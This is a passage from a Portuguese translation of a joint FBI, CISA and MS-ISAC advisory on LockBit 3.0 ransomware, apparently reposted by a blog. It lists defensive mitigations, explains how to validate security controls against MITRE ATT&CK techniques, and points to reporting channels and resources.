- Mantenha todos os sistemas operacionais, software e firmware atualizados. A correção oportuna é uma das etapas mais eficientes e econômicas que uma organização pode adotar para minimizar sua exposição a ameaças de segurança cibernética.
- Segmente redes [ CPG 8.1 ] para impedir a propagação de ransomware. A segmentação de rede pode ajudar a prevenir a disseminação de ransomware controlando os fluxos de tráfego entre — e o acesso a — várias sub-redes e restringindo o movimento lateral do adversário.
- Identifique, detecte e investigue atividades anormais e possível travessia do ransomware indicado com uma ferramenta de monitoramento de rede. Para ajudar na detecção do ransomware, implemente uma ferramenta que registre e relate todo o tráfego de rede, incluindo atividade de movimento lateral em uma rede [ CPG 5.1 ]. As ferramentas de detecção e resposta de endpoint (EDR) são particularmente úteis para detectar conexões laterais, pois têm informações sobre conexões de rede comuns e incomuns para cada host.
- Instale, atualize regularmente e habilite a detecção em tempo real para software antivírus em todos os hosts.
- Revise controladores de domínio, servidores, estações de trabalho e diretórios ativos para contas novas e/ou não reconhecidas.
- Auditar contas de usuários com privilégios administrativos e configurar controles de acesso de acordo com o princípio do menor privilégio [ CPG 1.5 ].
- Desabilite as portas não utilizadas.
- Considere adicionar um banner de e-mail aos e-mails [ CPG 8.3 ] recebidos de fora da sua organização.
- Desativar hiperlinks em e-mails recebidos.
- Implemente o acesso baseado em tempo para contas definidas no nível de administrador e superior. Por exemplo, o método de acesso Just-in-Time (JIT) fornece acesso privilegiado quando necessário e pode suportar a aplicação do princípio do menor privilégio (bem como o modelo Zero Trust). Este é um processo em que uma política em toda a rede é definida para desabilitar automaticamente as contas de administrador no nível do Active Directory quando a conta não estiver em necessidade direta. Os usuários individuais podem enviar suas solicitações por meio de um processo automatizado que lhes concede acesso a um sistema especificado por um período de tempo definido quando precisam oferecer suporte à conclusão de uma determinada tarefa.
- Desative atividades e permissões de linha de comando e script. A escalação de privilégios e o movimento lateral geralmente dependem de utilitários de software executados na linha de comando. Se os agentes de ameaças não conseguirem executar essas ferramentas, eles terão dificuldade em escalar privilégios e/ou mover-se lateralmente.
- Mantenha backups off-line de dados e faça backup e restauração regularmente [ CPG 7.3 ]. Ao instituir essa prática, a organização garante que eles não serão interrompidos severamente e/ou terão apenas dados irrecuperáveis.
- Certifique-se de que todos os dados de backup sejam criptografados, imutáveis (ou seja, não possam ser alterados ou excluídos) e cubram toda a infraestrutura de dados da organização [ CPG 3.3 ].
VALIDAR CONTROLES DE SEGURANÇA
Além de aplicar atenuações, o FBI, a CISA e o MS-ISAC recomendam exercitar, testar e validar o programa de segurança de sua organização contra os comportamentos de ameaças mapeados para a estrutura MITRE ATT&CK for Enterprise neste comunicado. As agências de autoria do FBI, CISA e MS-ISAC recomendam testar seu inventário de controles de segurança existente para avaliar como eles funcionam em relação às técnicas ATT&CK descritas neste comunicado.
Para começar:
- Selecione uma técnica ATT&CK descrita neste comunicado (consulte a Tabela 3).
- Alinhe suas tecnologias de segurança contra a técnica.
- Teste suas tecnologias contra a técnica.
- Analise o desempenho de suas tecnologias de detecção e prevenção.
- Repita o processo para todas as tecnologias de segurança para obter um conjunto de dados de desempenho abrangentes.
- Ajuste seu programa de segurança, incluindo pessoas, processos e tecnologias, com base nos dados gerados por esse processo.
O FBI, CISA e MS-ISAC recomendam testar continuamente seu programa de segurança em escala e em um ambiente de produção para garantir o desempenho ideal em relação às técnicas MITRE ATT&CK identificadas neste comunicado.
RECURSOS
- Stopransomware.gov é uma abordagem de todo o governo que fornece um local central para recursos e alertas de ransomware.
- Recurso para mitigar um ataque de ransomware: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
- Serviços de higiene cibernética gratuitos: serviços de higiene cibernética e avaliação de prontidão para ransomware.
COMUNICANDO
O FBI está buscando qualquer informação que possa ser legalmente compartilhada, incluindo:
- Logs de limite mostrando a comunicação de e para endereços IP estrangeiros
- Exemplo de nota de resgate
- Comunicações com atores LockBit 3.0
- Informações da carteira Bitcoin
- arquivos descriptografados
- Amostra benigna de um arquivo criptografado
O FBI, CISA e MS-ISAC não incentivam o pagamento de resgate, pois o pagamento não garante que os arquivos das vítimas serão recuperados. Além disso, o pagamento também pode encorajar os adversários a visar organizações adicionais, encorajar outros criminosos a se envolver na distribuição de ransomware e/ou financiar atividades ilícitas. Independentemente de você ou sua organização ter decidido pagar o resgate, o FBI e a CISA pedem que você relate imediatamente os incidentes de ransomware a um escritório local do FBI ou à CISA em [email protected]. Entidades governamentais estaduais, locais, tribais e territoriais (SLTT) também podem se reportar ao MS-ISAC ([email protected] ou 866-787-4722).
ISENÇÃO DE RESPONSABILIDADE
As informações neste relatório estão sendo fornecidas “como estão” apenas para fins informativos. O FBI, CISA e MS-ISAC não endossam nenhum produto ou serviço comercial, incluindo quaisquer objetos de análise. Qualquer referência a produtos, processos ou serviços comerciais específicos por marca de serviço, marca comercial, fabricante ou de outra forma não constitui ou implica endosso, recomendação ou favorecimento do FBI, CISA ou MS-ISAC.
Fonte: CISA
Descubra mais sobre DCiber
Assine para receber os posts mais recentes por e-mail.